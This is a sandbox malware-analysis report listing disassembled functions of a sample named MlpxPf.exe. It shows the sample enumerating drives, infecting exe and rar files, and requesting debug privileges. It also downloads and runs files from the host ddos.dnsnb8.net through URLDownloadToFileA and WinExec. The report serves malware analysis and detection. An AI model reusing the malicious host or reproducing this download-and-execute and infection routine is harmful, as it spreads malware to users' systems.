Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 0e7cf3301dc00453ee5475df41707899da00405db0271b5420f966cb2aa72f00
Instruction ID: 24bb39f078ba9bb7fb98b7dc475a2ac1f77ee981e8b7049319ab8559d03b8b75
Opcode Fuzzy Hash: 0e7cf3301dc00453ee5475df41707899da00405db0271b5420f966cb2aa72f00
Instruction Fuzzy Hash: 8C51B170C20698DBDB15DFA4CC89BDEBBB4BF05304F144259E449AB382D7746A988B92

Function 002E99A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 002E99F1

Strings

type must be boolean, but is , xrefs: 002E9AE2
type must be string, but is , xrefs: 002E9A58

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: 76c741dca43cc752c53da76f57d0d4defda75527d33f7561519d1b8086c8a8a1
Instruction ID: f3cb6cd776e8f2f09f4bbe12482f56e1c086ca2a14e74f25a91bf146094d566e
Opcode Fuzzy Hash: 76c741dca43cc752c53da76f57d0d4defda75527d33f7561519d1b8086c8a8a1
Instruction Fuzzy Hash: 5C316E75950248AFCB15EBA4D842BEEB7A8EF04300F50427AF419D77D2EB34AE54C792

Analysis Process: MlpxPf.exePID: 1840, Parent PID: 3712COMMON

Execution Graph

Execution Coverage:	28.8%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	16.5%
Total number of Nodes:	297
Total number of Limit Nodes:	10

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 003529E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00352A02
wsprintfA.USER32 ref: 00352A1A
memset.MSVCRT ref: 00352A44
lstrlen.KERNEL32(?), ref: 00352A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00352A6C
strrchr.MSVCRT ref: 00352A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00352A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00352AAE
memset.MSVCRT ref: 00352AC6
memset.MSVCRT ref: 00352ADA
FindFirstFileA.KERNEL32(?,?), ref: 00352AEF
memset.MSVCRT ref: 00352B13
lstrcmpiA.KERNEL32(?,?), ref: 00352B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00352B67
FindClose.KERNEL32(00000000), ref: 00352B6E

Strings

C:\, xrefs: 00352A2F
Documents and Settings, xrefs: 00352A8D, 00352A92, 00352A9A, 00352AAD
%s*, xrefs: 00352A14

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 40374975571cdce6d6912e601ce7d03124917bee32da0c507761acd654916538
Instruction ID: c0b573a07f703608cb7b63907e6744701d731f64351fefb0a6eed974e752b00d
Opcode Fuzzy Hash: 40374975571cdce6d6912e601ce7d03124917bee32da0c507761acd654916538
Instruction Fuzzy Hash: 9F4194B2404349AFD722DBA0DC49DEB77ACEB85356F04082AF945C3171E634D64C8BA2

Function 00351718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00351729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0035174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0035177C
__aulldiv.LIBCMT ref: 00351796
__aulldiv.LIBCMT ref: 003517A8

Strings

Time, xrefs: 0035173D, 00351766
SOFTWARE\GTplus, xrefs: 00351742, 0035176B
C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 00351722

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-2397731975
Opcode ID: d3ddbd2587692622ed4eb5008cdb626ef852f98dbc8894e94e4e04a607f030d6
Instruction ID: dc508439260e05c53c0f08b25cb817029f38130d4efec4e0174239f6913e1c1c
Opcode Fuzzy Hash: d3ddbd2587692622ed4eb5008cdb626ef852f98dbc8894e94e4e04a607f030d6
Instruction Fuzzy Hash: 6E118671A00209BBDB129BA4CC85FEF7BBCEB44B56F108515FD01B61A1D6719B4CCB64

Function 00356076 Relevance: 11.1, APIs: 7, Instructions: 614
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 003560BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 003560DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00356189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 003561A5

Memory Dump Source

Source File: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b2d83c07e2c73f132056d7811d2e983a31bb42f5d830739293ebf7aa577ba0d4
Instruction ID: 802cab497e19043d78b00d71d4a77ae1e3f29cd6bc634c5dfcade293457f2705
Opcode Fuzzy Hash: b2d83c07e2c73f132056d7811d2e983a31bb42f5d830739293ebf7aa577ba0d4
Instruction Fuzzy Hash: 801223B25087848FDB328F24CC56FEA7BB4EF02311F99495DDC868B5B2D674A908C751

Function 00352B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00352BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00352BB4
GetDriveTypeA.KERNEL32(?), ref: 00352BD3
CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00352BEE
lstrlen.KERNEL32(?), ref: 00352BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00352C16
CreateThread.KERNEL32(00000000,00000000,00352845,00000000,00000000,00000000), ref: 00352C3A

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: d17107860b3bd752f8bda0624bc4a5f40126622ba78c60fe4e5f46caa94b6af0
Instruction ID: 33a481edc2b6c8787b0e5a8d9cc8027c4b374561f36ac424765dacdc66787830
Opcode Fuzzy Hash: d17107860b3bd752f8bda0624bc4a5f40126622ba78c60fe4e5f46caa94b6af0
Instruction Fuzzy Hash: 0821C3B180034CAFE7229F64AC84DAF7B6DFB0635AF150125FC42A3171D7208D4ACB60

Function 00351E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,003532B0,00000164,00352986,?), ref: 00351EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00351ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00351EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00351F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00351F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0035201E
memset.MSVCRT ref: 003520D8
memset.MSVCRT ref: 003520EA
memcpy.MSVCRT ref: 0035222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00352238
FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0035224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003522C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003522CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003522DD
WriteFile.KERNEL32(000000FF,00354008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003522F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0035230D
FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00352322
UnmapViewOfFile.KERNEL32(?,?,003532B0,00000164,00352986,?), ref: 00352340
FindCloseChangeNotification.KERNEL32(?,?,003532B0,00000164,00352986,?), ref: 0035234E
CloseHandle.KERNEL32(000000FF,?,003532B0,00000164,00352986,?), ref: 00352359

Strings

<@5, xrefs: 00352290
C@5, xrefs: 0035229E
5@5, xrefs: 00352282
.@5, xrefs: 00352274
m@5, xrefs: 00351E8F, 0035225A

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: File$CloseView$ChangeFindNotificationPointer$CreateUnmapWritememset$AttributesFlushHandleMappingmemcpy
String ID: .@5$5@5$<@5$C@5$m@5
API String ID: 307705342-476672356
Opcode ID: 98baf6affbdd1b943d95537366400a3774d9938ecc3f698d4dd9828131e29595
Instruction ID: dc18220e907a35f934e58e01ad3d2638a585ca30164b6f9457ded3734c15c252
Opcode Fuzzy Hash: 98baf6affbdd1b943d95537366400a3774d9938ecc3f698d4dd9828131e29595
Instruction Fuzzy Hash: AFF14B75900608EFCB26DFA4DC81EAEBBB5FF09316F104529E909A76A1D730AD85CF50

Function 00351973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(\N5`N5,00000000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00351992
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003519BA
Sleep.KERNEL32(00000064), ref: 003519C6
wsprintfA.USER32 ref: 003519EC
CopyFileA.KERNEL32(?,?,00000000), ref: 00351A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00351A1E
GetFileSize.KERNEL32(?,00000000), ref: 00351A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00351A46
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00351A65
CloseHandle.KERNEL32(000000FF), ref: 00351A90
DeleteFileA.KERNEL32(?), ref: 00351AA7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00351AC1

Strings

%s%.8X.data, xrefs: 003519E6
C:\Users\user\AppData\Local\Temp\, xrefs: 003519DB
\N5`N5, xrefs: 00351980
C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 0035197C

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MlpxPf.exe$\N5`N5
API String ID: 716042067-2946605781
Opcode ID: 2296dca8266f75ac1ae05514261ec80d3076c8dafd2ee583bd40a49d7a8cba39
Instruction ID: f6e4748725419ae1059a73267c10d2382e5235f943860cdcc3b58d3f16e4d5e5
Opcode Fuzzy Hash: 2296dca8266f75ac1ae05514261ec80d3076c8dafd2ee583bd40a49d7a8cba39
Instruction Fuzzy Hash: 29514F71901219EFCB139F98CC84EAEBBBCFB04356F114569F916E61A0C3709E48CB90

Function 003528B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 003528D3
wsprintfA.USER32 ref: 003528F7
memset.MSVCRT ref: 00352925
wsprintfA.USER32 ref: 00352940

Part of subcall function 003529E2: memset.MSVCRT ref: 00352A02
Part of subcall function 003529E2: wsprintfA.USER32 ref: 00352A1A
Part of subcall function 003529E2: memset.MSVCRT ref: 00352A44
Part of subcall function 003529E2: lstrlen.KERNEL32(?), ref: 00352A54
Part of subcall function 003529E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00352A6C
Part of subcall function 003529E2: strrchr.MSVCRT ref: 00352A7C
Part of subcall function 003529E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00352A9F
Part of subcall function 003529E2: lstrlen.KERNEL32(Documents and Settings), ref: 00352AAE
Part of subcall function 003529E2: memset.MSVCRT ref: 00352AC6
Part of subcall function 003529E2: memset.MSVCRT ref: 00352ADA
Part of subcall function 003529E2: FindFirstFileA.KERNEL32(?,?), ref: 00352AEF
Part of subcall function 003529E2: memset.MSVCRT ref: 00352B13

strrchr.MSVCRT ref: 00352959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00352974

Strings

rar, xrefs: 00352988
%s\, xrefs: 0035293A
%s%s, xrefs: 003528F1
C:\Users\user\AppData\Local\Temp\, xrefs: 003529B3
exe, xrefs: 0035296D

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-1035934456
Opcode ID: 9d291a73c1271f2f3799b681570895680bde8c84d89e4e188895714d972a579f
Instruction ID: f30ed098e7251ea50c31a7fd153bbdb8a538bca6dd42500ed98f8d5ca2daabf4
Opcode Fuzzy Hash: 9d291a73c1271f2f3799b681570895680bde8c84d89e4e188895714d972a579f
Instruction Fuzzy Hash: EE31E77190030C6BDB239764DC85FDB776C9F12352F060852FD45A71A1E7B49ADC8BA0

Function 00351099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035185B: GetSystemTimeAsFileTime.KERNEL32(00351F92,00000000,?,00000000,?,?,?,00351F92,?,00000000,00000002), ref: 00351867
Part of subcall function 0035185B: srand.MSVCRT ref: 00351878
Part of subcall function 0035185B: rand.MSVCRT ref: 00351880
Part of subcall function 0035185B: srand.MSVCRT ref: 00351890
Part of subcall function 0035185B: rand.MSVCRT ref: 00351894

WinExec.KERNEL32(?,00000005), ref: 003510F1
lstrlen.KERNEL32(00354748), ref: 003510FA
wsprintfA.USER32 ref: 0035112A
wsprintfA.USER32 ref: 00351143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0035115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00351169
Sleep.KERNEL32 ref: 00351179

Strings

%s%.8X.exe, xrefs: 00351124
HG5, xrefs: 0035112C
ddos.dnsnb8.net, xrefs: 003510C8, 003510CF, 00351140, 00351168
http://%s:%d/%s/%s, xrefs: 003510C2, 00351141
cj/, xrefs: 00351135
C:\Users\user\AppData\Local\Temp\, xrefs: 00351119

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG5$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-204666294
Opcode ID: 29c45cb13863b06f9fbc01ea753e6a0e00399ac980b76238034db8152bad714a
Instruction ID: 0a70dadb2425570ec1c8c6f65572ce6130fea917be5f52990b6988a15945a1e6
Opcode Fuzzy Hash: 29c45cb13863b06f9fbc01ea753e6a0e00399ac980b76238034db8152bad714a
Instruction Fuzzy Hash: 94211B75900348BADB279BA0DC49FAFBBBDAB0535BF114095E905A3071D7749B888FA0

Function 00351638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0035164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0035165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\MlpxPf.exe,00000104), ref: 0035166E
CreateThread.KERNEL32(00000000,00000000,00351099,00000000,00000000,00000000), ref: 003516AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 003516BD

Part of subcall function 0035139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 003513BC
Part of subcall function 0035139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 003513DA
Part of subcall function 0035139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00351448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 003516E5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00351644
Documents and Settings, xrefs: 00351696
C:\Windows\system32, xrefs: 00351656
C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 00351662, 00351667, 003516DD

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MlpxPf.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-474348920
Opcode ID: ec46645bc622ff7f68ef5ff6fa84c1c7a1d579a5aa554c0d8fb9a4bf7a4578cc
Instruction ID: 959f47b53f3bec6e122d337f21d5bc7d3392ae1a32d282d61c0f2d09df7da504
Opcode Fuzzy Hash: ec46645bc622ff7f68ef5ff6fa84c1c7a1d579a5aa554c0d8fb9a4bf7a4578cc
Instruction Fuzzy Hash: E41196725413147BCB2367A49D49FDB3E6DEB453A7F010011FE0A960F1D6708588CBA1

Function 00351000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG5,http://%s:%d/%s/%s,003510E8,?), ref: 00351018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76C08400), ref: 00351029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00351038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0035104B
UnmapViewOfFile.KERNEL32(00000000), ref: 00351075
CloseHandle.KERNEL32(?), ref: 0035108B
CloseHandle.KERNEL32(00000000), ref: 0035108E

Strings

HG5, xrefs: 00351001
ddos.dnsnb8.net, xrefs: 00351026
http://%s:%d/%s/%s, xrefs: 00351000

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: HG5$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-870461908
Opcode ID: c9f9e06a75348554a4ccfa4ae6373b6d319390df348c240e4e645d1617ebd98a
Instruction ID: 202146857b5a79df69fcab2ec034070be18807e4332990b4ce5c65a8c728ca11
Opcode Fuzzy Hash: c9f9e06a75348554a4ccfa4ae6373b6d319390df348c240e4e645d1617ebd98a
Instruction Fuzzy Hash: B4011EB150035DBFE6226F609C88F2BBBACEB447EAF014529B645A31E0D6705E448A61

Function 00352C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00352C57

Part of subcall function 00351973: PathFileExistsA.SHLWAPI(\N5`N5,00000000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00351992
Part of subcall function 00351973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003519BA
Part of subcall function 00351973: Sleep.KERNEL32(00000064), ref: 003519C6
Part of subcall function 00351973: wsprintfA.USER32 ref: 003519EC
Part of subcall function 00351973: CopyFileA.KERNEL32(?,?,00000000), ref: 00351A00
Part of subcall function 00351973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00351A1E
Part of subcall function 00351973: GetFileSize.KERNEL32(?,00000000), ref: 00351A2C
Part of subcall function 00351973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00351A46
Part of subcall function 00351973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00351A65

CreateThread.KERNEL32(00000000,00000000,00352B8C,00000000,00000000,00000000), ref: 00352C99
WaitForMultipleObjects.KERNEL32(00000001,003516BA,00000001,000000FF,?,003516BA,00000000), ref: 00352CAC
VirtualFree.KERNEL32(01110000,00000000,00008000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,00354E5C,00354E60,?,003516BA,00000000), ref: 00352CC2

Strings

C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 00352C69

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

